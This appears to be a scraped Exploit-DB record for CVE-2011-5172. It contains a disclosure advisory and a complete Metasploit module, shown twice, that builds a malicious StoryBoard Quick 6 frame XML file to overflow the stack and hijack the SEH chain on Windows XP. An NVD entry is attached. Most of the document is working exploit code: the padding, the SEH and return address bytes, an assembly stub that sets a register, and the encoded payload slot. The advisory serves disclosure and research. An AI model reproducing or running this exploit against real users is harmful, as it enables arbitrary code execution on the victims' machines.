ID EDB-ID:18186 Type exploitdb Reporter Nick Freeman Modified 2011-12-01T00:00:00
Description
StoryBoard Quick 6 - Stack Buffer Overflow. CVE-2011-5172. Local exploit for windows platform
#NameLStoryBoard Quick 6 Stack Buffer Overflow
#Vendor Website:http://www.powerproduction.com/
#Date Released:29/11/2011
#Affected Software: StoryBoard Quick 6 (potentially also StoryBoard Artist and StoryBoard Studio)
#Researcher: Nick Freeman (nick.freeman@security-assessment.com)
#Description
#Security-Assessment.com has discovered a file format vulnerability in the XML files used to describe frames #in the StoryBoard Quick 6 software. The <string> element used to define a filename was found to be #vulnerable to a buffer overflow, which can be exploited to execute arbitrary code under the context of the #user running StoryBoard Quick 6. Supplying a long file name causes memory corruption within the application.
#By crafting a file that contains more than 507 characters in the <string> field, the StoryBoard Quick 6 #application will use the next 4 characters in an unsafe manner. These four characters are used as a pointer #to the source address for a string copy function. It is possible to write user-supplied data onto the stack #by changing the value of these 4 characters to a memory location containing a pointer to data within the #Frame.xml file. This strcpy function overwrites a significant portion of the stack, including the Structured #Exception Handler.
#Disclosure Timeline:
#Security-Assessment.com practices responsible disclosure and made significant effort to report this #vulnerability to PowerProduction Software.
#13/06/2011: First email sent to PowerProduction, asking for contact details for security or developer #personnel.
#17/06/2011: After several attempts to get in contact, PowerProduction asks me for a customer number.
#17/06/2011: Security-Assessment.com replies stating that this issue is exploitable without a customer number. #No response was received from PowerProduction after this email.
#23/06/2011: Security-Assessment.com sends a follow-up email stating that the vulnerability is still present.
#10/07/2011: A final email is sent stating that PowerProduction customers are vulnerable.
#05/11/11: Vulnerability released at Kiwicon V in Wellington, New Zealand.
#19/11/11: Vulnerability released at Ruxcon 2011 in Melbourne, Australia.
#29/11/11: Vulnerability advisory and exploit code published.
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'StoryBoard Quick 6 Memory Corruption Vulnerability',
'Description' => %q{
This module exploits a stack-based buffer overflow in StoryBoard Quick 6.
},
'License' => MSF_LICENSE,
'Author' => [ 'vt [nick.freeman@security-assessment.com]' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'URL', 'http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf' ]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX',
}
},
'Platform' => 'win',
'Targets' =>
[
[ 'Default (WinXP SP3 No DEP)',
{
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 30 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', "Frame-001.xml"]),
], self.class)
end
def exploit
template = %Q|<plist version="1.0">
<dict>
<key>ID</key>
<integer>1</integer>
<key>Objects</key>
<array>
<dict>
<key>Size-X</key>
<real>134.00000000</real>
<key>Size-Y</key>
<real>667.00000000</real>
<key>Type</key>
<string>cLIB</string>
<key>Library</key>
<string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid</string>
<key>ID</key>
<string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAREPLACE_1BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB.xo</string>
<key>Colorization</key>
<dict>
<key>Arms</key>
<string>ff4b70ff</string>
<key>Eyes</key>
<string>ff00ff00</string>
<key>Hair</key>
<string>ff68502d</string>
<key>Face</key>
<string>fffdd8a1</string>
<key>REPLACE_2</key>
<string>ff070707</string>
<key>Skin</key>
<string>ffd7b583</string>
<key>Legs</key>
<string>ff06007e</string>
</dict>
<key>Whom</key>
<string>LINDA</string>
<key>Scale-X</key>
<real>0.74842578</real>
<key>Scale-Y</key>
<real>0.74842578</real>
<key>Offset-Y</key>
<real>41.60000610</real>
</dict>
<dict>
<key>Size-X</key>
<real>310.00000000</real>
<key>Size-Y</key>
<real>575.00000000</real>
<key>Type</key>
<string>cLIB</string>
<key>Library</key>
<string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 2.artgrid</string>
<key>ID</key>
<string>30012.xo</string>
<key>Colorization</key>
<dict>
<key>Arms</key>
<string>ff909090</string>
<key>Eyes</key>
<string>ff00ff00</string>
<key>Hair</key>
<string>ff090909</string>
<key>Face</key>
<string>ffff0837</string>
<key>Shoe</key>
<string>ff1100c2</string>
<key>Skin</key>
<string>ffb78d4f</string>
<key>Legs</key>
<string>ff050505</string>
</dict>
<key>Whom</key>
<string>C.J.</string>
<key>Scale-X</key>
<real>0.86817396</real>
<key>Scale-Y</key>
<real>0.86817396</real>
<key>Offset-Y</key>
<real>41.60000610</real>
</dict>
<dict>
<key>IsSelected</key>
REPLACE_3<true/>
<key>Size-X</key>
<real>682.00000000</real>
<key>Size-Y</key>
<real>565.00000000</real>
<key>Type</key>
<string>cLIB</string>
<key>Library</key>
<string>C:\\Program Files\\StoryBoard Quick 6\\Libraries\\Characters\\Woman 1.artgrid</string>
<key>ID</key>
<string>30013.xo</string>
<key>Colorization</key>
<dict>
<key>Arms</key>
<string>ff4b70ff</string>
<key>Eyes</key>
<string>ff00ff00</string>
<key>Hair</key>
<string>ff68502d</string>
<key>Face</key>
<string>fffdd8a1</string>
<key>Shoe</key>
<string>ff070707</string>
<key>Skin</key>
<string>ffd7b583</string>
<key>Legs</key>
<string>ff06007e</string>
</dict>
<key>Whom</key>
<string>LINDA</string>
<key>Scale-X</key>
<real>0.95718473</real>
<key>Scale-Y</key>
<real>0.95718473</real>
<key>Offset-Y</key>
<real>62.40469360</real>
</dict>
</array>
<key>FrameDB</key>
<dict>
<key>TXT-0006</key>
<data>
MDYvMDMvMTEgMjM6Mjg6MDMA
</data>
</dict>
<key>UN-Thumb</key>
<true/>
</dict>
</plist>
|
sploit = template.gsub(/REPLACE_1/, "\xd9\xcf\xe5\x74")
padd = "\x43" * 4256
nseh = "\x90\xeb\x06\x90"
seh = "\x25\x12\xd1\x72" # POP, POP, RETN
nops = "\x90"*9
# set buffer register
bufregstub = "\x8b\xc4" # mov eax, esp
bufregstub += "\x33\xc9" # xor ecx
bufregstub += "\x83\xc1\x7f" # add ecx, 7f
bufregstub += "\x6b\xc9\x17" # imul ecx,17
bufregstub += "\x83\xc1\x7b" # add ecx,7b
bufregstub += "\x03\xc1" # add eax,ecx # eax now points to buffer, ready to decode shellcode.
sploit = sploit.gsub(/REPLACE_2/,padd + nseh + seh + nops + bufregstub + payload.encoded + ("\x44"*(11137-payload.encoded.length)))
sploit = sploit.gsub(/REPLACE_3/, "\x45"*658)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
{"id": "EDB-ID:18186", "type": "exploitdb", "bulletinFamily": "exploit", "title": "StoryBoard Quick 6 - Stack Buffer Overflow", "description": "StoryBoard Quick 6 - Stack Buffer Overflow. CVE-2011-5172. Local exploit for windows platform", "published": "2011-12-01T00:00:00", "modified": "2011-12-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/18186/", "reporter": "Nick Freeman", "references": [], "cvelist": ["CVE-2011-5172"], "lastseen": "2016-02-02T09:19:32", "viewCount": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-02T09:19:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-5172"]}], "modified": "2016-02-02T09:19:32", "rev": 2}, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/18186/", "sourceData": "#NameLStoryBoard Quick 6 Stack Buffer Overflow \r\n#Vendor Website:http://www.powerproduction.com/ \r\n#Date Released:29/11/2011 \r\n#Affected Software: StoryBoard Quick 6 (potentially also StoryBoard Artist and StoryBoard Studio) \r\n#Researcher: Nick Freeman (nick.freeman@security-assessment.com)\r\n\r\n\r\n#Description\r\n#Security-Assessment.com has discovered a file format vulnerability in the XML files used to describe frames #in the StoryBoard Quick 6 software. The <string> element used to define a filename was found to be #vulnerable to a buffer overflow, which can be exploited to execute arbitrary code under the context of the #user running StoryBoard Quick 6. Supplying a long file name causes memory corruption within the application.\r\n\r\n#By crafting a file that contains more than 507 characters in the <string> field, the StoryBoard Quick 6 #application will use the next 4 characters in an unsafe manner. These four characters are used as a pointer #to the source address for a string copy function. It is possible to write user-supplied data onto the stack #by changing the value of these 4 characters to a memory location containing a pointer to data within the #Frame.xml file. This strcpy function overwrites a significant portion of the stack, including the Structured #Exception Handler.\r\n\r\n#Disclosure Timeline:\r\n#Security-Assessment.com practices responsible disclosure and made significant effort to report this #vulnerability to PowerProduction Software.\r\n#13/06/2011: First email sent to PowerProduction, asking for contact details for security or developer #personnel.\r\n#17/06/2011: After several attempts to get in contact, PowerProduction asks me for a customer number.\r\n#17/06/2011: Security-Assessment.com replies stating that this issue is exploitable without a customer number. #No response was received from PowerProduction after this email.\r\n#23/06/2011: Security-Assessment.com sends a follow-up email stating that the vulnerability is still present.\r\n#10/07/2011: A final email is sent stating that PowerProduction customers are vulnerable.\r\n#05/11/11: Vulnerability released at Kiwicon V in Wellington, New Zealand.\r\n#19/11/11: Vulnerability released at Ruxcon 2011 in Melbourne, Australia.\r\n#29/11/11: Vulnerability advisory and exploit code published.\r\n\r\n\r\nrequire 'msf/core'\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'StoryBoard Quick 6 Memory Corruption Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in StoryBoard Quick 6.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' \t => [ 'vt [nick.freeman@security-assessment.com]' ],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'URL', 'http://security-assessment.com/files/documents/advisory/StoryBoard_Quick_6-Stack_Buffer_Overflow.pdf' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumMixed,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'BufferRegister' => 'EAX',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Default (WinXP SP3 No DEP)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Nov 30 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', \"Frame-001.xml\"]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\ttemplate = %Q|<plist version=\"1.0\">\r\n<dict>\r\n<key>ID</key>\r\n<integer>1</integer>\r\n<key>Objects</key>\r\n<array>\r\n<dict>\r\n<key>Size-X</key>\r\n<real>134.00000000</real>\r\n<key>Size-Y</key>\r\n<real>667.00000000</real>\r\n<key>Type</key>\r\n<string>cLIB</string>\r\n<key>Library</key>\r\n<string>C:\\\\Program Files\\\\StoryBoard Quick 6\\\\Libraries\\\\Characters\\\\Woman 1.artgrid</string>\r\n<key>ID</key>\r\n<string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAREPLACE_1BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB.xo</string>\r\n<key>Colorization</key>\r\n<dict>\r\n<key>Arms</key>\r\n<string>ff4b70ff</string>\r\n<key>Eyes</key>\r\n<string>ff00ff00</string>\r\n<key>Hair</key>\r\n<string>ff68502d</string>\r\n<key>Face</key>\r\n<string>fffdd8a1</string>\r\n<key>REPLACE_2</key>\r\n<string>ff070707</string>\r\n<key>Skin</key>\r\n<string>ffd7b583</string>\r\n<key>Legs</key>\r\n<string>ff06007e</string>\r\n</dict>\r\n<key>Whom</key>\r\n<string>LINDA</string>\r\n<key>Scale-X</key>\r\n<real>0.74842578</real>\r\n<key>Scale-Y</key>\r\n<real>0.74842578</real>\r\n<key>Offset-Y</key>\r\n<real>41.60000610</real>\r\n</dict>\r\n<dict>\r\n<key>Size-X</key>\r\n<real>310.00000000</real>\r\n<key>Size-Y</key>\r\n<real>575.00000000</real>\r\n<key>Type</key>\r\n<string>cLIB</string>\r\n<key>Library</key>\r\n<string>C:\\\\Program Files\\\\StoryBoard Quick 6\\\\Libraries\\\\Characters\\\\Woman 2.artgrid</string>\r\n<key>ID</key>\r\n<string>30012.xo</string>\r\n<key>Colorization</key> \r\n<dict>\r\n<key>Arms</key>\r\n<string>ff909090</string>\r\n<key>Eyes</key>\r\n<string>ff00ff00</string>\r\n<key>Hair</key>\r\n<string>ff090909</string>\r\n<key>Face</key>\r\n<string>ffff0837</string>\r\n<key>Shoe</key>\r\n<string>ff1100c2</string>\r\n<key>Skin</key>\r\n<string>ffb78d4f</string>\r\n<key>Legs</key>\r\n<string>ff050505</string>\r\n</dict>\r\n<key>Whom</key>\r\n<string>C.J.</string>\r\n<key>Scale-X</key>\r\n<real>0.86817396</real>\r\n<key>Scale-Y</key>\r\n<real>0.86817396</real>\r\n<key>Offset-Y</key>\r\n<real>41.60000610</real>\r\n</dict>\r\n<dict>\r\n<key>IsSelected</key>\r\nREPLACE_3<true/>\r\n<key>Size-X</key>\r\n<real>682.00000000</real>\r\n<key>Size-Y</key>\r\n<real>565.00000000</real>\r\n<key>Type</key>\r\n<string>cLIB</string>\r\n<key>Library</key>\r\n<string>C:\\\\Program Files\\\\StoryBoard Quick 6\\\\Libraries\\\\Characters\\\\Woman 1.artgrid</string>\r\n<key>ID</key>\r\n<string>30013.xo</string>\r\n<key>Colorization</key>\r\n<dict>\r\n<key>Arms</key>\r\n<string>ff4b70ff</string>\r\n<key>Eyes</key>\r\n<string>ff00ff00</string>\r\n<key>Hair</key>\r\n<string>ff68502d</string>\r\n<key>Face</key>\r\n<string>fffdd8a1</string>\r\n<key>Shoe</key>\r\n<string>ff070707</string>\r\n<key>Skin</key>\r\n<string>ffd7b583</string>\r\n<key>Legs</key>\r\n<string>ff06007e</string>\r\n</dict>\r\n<key>Whom</key>\r\n<string>LINDA</string>\r\n<key>Scale-X</key>\r\n<real>0.95718473</real>\r\n<key>Scale-Y</key>\r\n<real>0.95718473</real>\r\n<key>Offset-Y</key>\r\n<real>62.40469360</real>\r\n</dict>\r\n</array>\r\n<key>FrameDB</key>\r\n<dict>\r\n<key>TXT-0006</key>\r\n<data>\r\nMDYvMDMvMTEgMjM6Mjg6MDMA\r\n</data>\r\n</dict>\r\n<key>UN-Thumb</key>\r\n<true/>\r\n</dict>\r\n</plist>\r\n|\r\n\r\n\t\tsploit = template.gsub(/REPLACE_1/, \"\\xd9\\xcf\\xe5\\x74\")\r\n\r\n\t\tpadd = \"\\x43\" * 4256\r\n\t\tnseh = \"\\x90\\xeb\\x06\\x90\"\r\n\t\tseh = \"\\x25\\x12\\xd1\\x72\" # POP, POP, RETN\r\n\t\tnops = \"\\x90\"*9\r\n\r\n\t\t# set buffer register\r\n\t\tbufregstub = \"\\x8b\\xc4\" \t# mov eax, esp\r\n\t\tbufregstub += \"\\x33\\xc9\" \t# xor ecx\r\n\t\tbufregstub += \"\\x83\\xc1\\x7f\"\t# add ecx, 7f\r\n\t\tbufregstub += \"\\x6b\\xc9\\x17\"\t# imul ecx,17\r\n\t\tbufregstub += \"\\x83\\xc1\\x7b\" # add ecx,7b\r\n\t\tbufregstub += \"\\x03\\xc1\" \t# add eax,ecx # eax now points to buffer, ready to decode shellcode.\r\n\t\t\r\n\t\tsploit = sploit.gsub(/REPLACE_2/,padd + nseh + seh + nops + bufregstub + payload.encoded + (\"\\x44\"*(11137-payload.encoded.length)))\r\n\t\r\n\t\tsploit = sploit.gsub(/REPLACE_3/, \"\\x45\"*658)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(sploit)\r\n\r\n\tend\r\n\r\nend\r\n", "osvdbidlist": ["77421"]}
{"cve": [{"lastseen": "2020-10-03T11:39:34", "description": "Stack-based buffer overflow in StoryBoard Quick 6 Build 3786, and possibly StoryBoard Artist and StoryBoard Studio, allows remote attackers to execute arbitrary code via a long string in the string element field in a frame xml file.", "edition": 3, "cvss3": {}, "published": "2012-09-15T17:55:00", "title": "CVE-2011-5172", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5172"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/a:powerproduction:storyboard_quick:6.0"], "id": "CVE-2011-5172", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5172", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:powerproduction:storyboard_quick:6.0:*:*:*:*:*:*:*"]}]}
